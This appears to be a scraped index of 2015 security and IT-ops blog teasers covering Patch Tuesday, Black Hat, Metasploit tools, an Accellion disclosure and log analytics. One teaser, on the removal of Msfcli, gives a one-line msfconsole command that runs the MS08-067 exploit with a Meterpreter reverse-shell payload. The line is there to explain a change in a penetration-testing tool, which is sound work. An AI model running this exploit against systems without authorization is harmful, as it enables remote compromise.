2 min
Patch Tuesday, July 2015
Administrators and security teams are in for a hectic week tackling 14 Microsoft
security bulletins, 2 Adobe updates addressing 4 CVEs for Flash\Shockwave and
Oracle has released their quarterly update for 63 of their product suites
(including Java, Oracle DB, MySQL and Solaris).
Of the 14 Microsoft security bulletins, 4 re
7 min
Events
The Black Hat Attendee Guide Part 2 - The Briefings
If you are just joining us, this is the second post in the series starting here.
Content is king. Research is what binds us, and you should not be surprised that
some of the best in the game focus their annual research calendar on the Black
Hat USA CFP. Offensive security research is the tail that wags the dog—many
vendors and architects spend the year trying to get back in front of some of the
bombs dropped at Black Hat each year.
There's a
4 min
The New Metasploit Browser Autopwn: Strikes Faster and Smarter - Part 1
Hi everyone,
Today, I'd like to debut a completely rewritten new cool toy for Metasploit:
Browser Autopwn 2. Browser Autopwn is the easiest and quickest way to explicitly
test browser vulnerabilities without the user having to painfully learn
everything there is about each exploit and the remote target before deployment.
In this blog post, I will provide an introduction on the tool. And then in my
next one, I will explain how you can take advantage of it to maximize your vuln
validation or pen
7 min
Web Application Security Scanning and the Art of Automation
A version of this blog was originally posted on Nov. 5, 2012.
Few people fully appreciate the difficulty in creating a web application
security scanner that can actually work well against most sites. In addition,
there is much debate about how much application security testing can be
automated and how much needs to be done by human hands. Let's look at a recent
conversation among some industry exp
3 min
Events
The Black Hat Attendee Guide, Part 1 - How to Survive Black Hat
If you're like me, you have wanted to go to Black Hat for ages. If you're going,
have a game plan. For
first timers, this series will be a primer full of guidance and survival tips.
For returning attendees, this will help maximize your experience at Black Hat.
First, I want to give you perspective on my bias, coloring guidance offered
here. My slant is that of someone who was a booth babe (sales engineer), a
speaker, an attendee, Review Board member and former Gen
4 min
Vulnerability Disclosure
R7-2015-08: Accellion File Transfer Appliance Vulnerabilities (CVE-2015-2856, CVE-2015-2857)
This disclosure covers two issues discovered with the Accellion File Transfer
Appliance, a device used for secure enterprise file transfers. Issue
R7-2015-08.1 is a remote file disclosure vulnerability, and issue R7-2015-08.2
is a remote command execution vulnerability. Metasploit modules have been
released for both issues, as of Pull Request 5694.
According to the vendor, both issues were addressed in version
1 min
Msfcli is No Longer Available in Metasploit
Hi everyone,
This January, we made an announcement about the deprecation of Msfcli, the
command line interface version for Metasploit. Today we are ready to say
good-bye to it. Instead of Msfcli, we recommend using the -x option in
Msfconsole. For example, here's how you can run MS08-067 in one line:
./msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST ; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ; run"
You can also leverage things like resource scripts o
4 min
IT Ops
Ditch the Debugger and Use Log Analysis Instead
This guest blog post is written by Matthew Skelton, Co-founder and Principal
Consultant at Skelton Thatcher Consulting.
--------------------------------------------------------------------------------
Summary: As a Developer, you cannot attach the debugger to your application in
Production, but you can use logging in a way that helps you easily diagnose
problems in both development AND Production. You also get to make friends with
Operations people – win! The applications we’re developing and
1 min
IT Ops
10 Best Practices for Log Management & Analytics: Part 1
This 3-part series covers Logentries’ 10 best practices for log management and
analytics. To download the complete article, click here.
As applications, hosting environments and infrastructure continue to grow in
size and complexity, having a well defined set of logging strategies and
practices is more important than ever.
In Logentri
2 min
IT Ops
Using Log Data Streams for Real-Time Analytics: Part 1
This 3-part series explores the definition and benefits of using log data
streams and real-time analytics for some common IT Ops use cases. To download
the complete article, click here.
Analytics tools are often focused on analyzing historical data. Taking a sample
of data from historical events, you can perform calculations to determine what
happened during that period of time and report on you
6 min
IT Ops
How to Implement ANTLR4 Autocomplete
Antlr4 is a new iteration of a popular Antlr parse tree generator. Antlr4
features great documentation and an in-depth book on the subject. However, the
topic of autocompletion lacks any substantive material. I
hope this article will steer you in the right direction if you are looking to
implement autocomplete functionality
3 min
Metasploit Weekly Wrapup
Weekly Metasploit Wrapup: Two More Flash Exploits
While Adobe has made great progress in releasing both regular and emergency updates to Flash, it's becoming clear that Flash itself is becoming an albatross around the neck of every browser.
1 min
Discover Assets Dynamically with Infoblox DHCP
A highlight of the Nexpose 5.15 release is the addition of Infoblox Trinzic DDI
to the growing list of Dynamic Discovery sources. With nearly 8,000 customers
worldwide, Infoblox is a market leader in DNS, DHCP and IP address management.
Building upon existing support for Microsoft DHCP log monitoring, released this
past spring, Nexpose customers that use Infoblox to manage DHCP activity can now
detect previously unknown devices whenever they connect to the network,
providing a more complete un
2 min
IT Ops
Announcing Logentries as Google Cloud Platform's First Log Analytics Partner
Today we’re excited to announce our partnership with Google Cloud Platform,
making Logentries the first provider of log analytics for Google Cloud
customers.
Logentries’ Google Cloud integration enables Google customers to perform
advanced analysis on their log data,
3 min
IT Ops
Introducing Logentries NEW Query Language: LEQL
We are excited to announce that Logentries’ new SQL-like query language, LEQL,
is now available for more advanced analytics and easy extraction of valuable
insights from your log data.
A SQL-Like Query Language
If you’ve ever used SQL, LEQL should feel familiar. In fact, Logentries already
supports a number of SQL-like search functions, including:
* SUM: Sums a set of values
*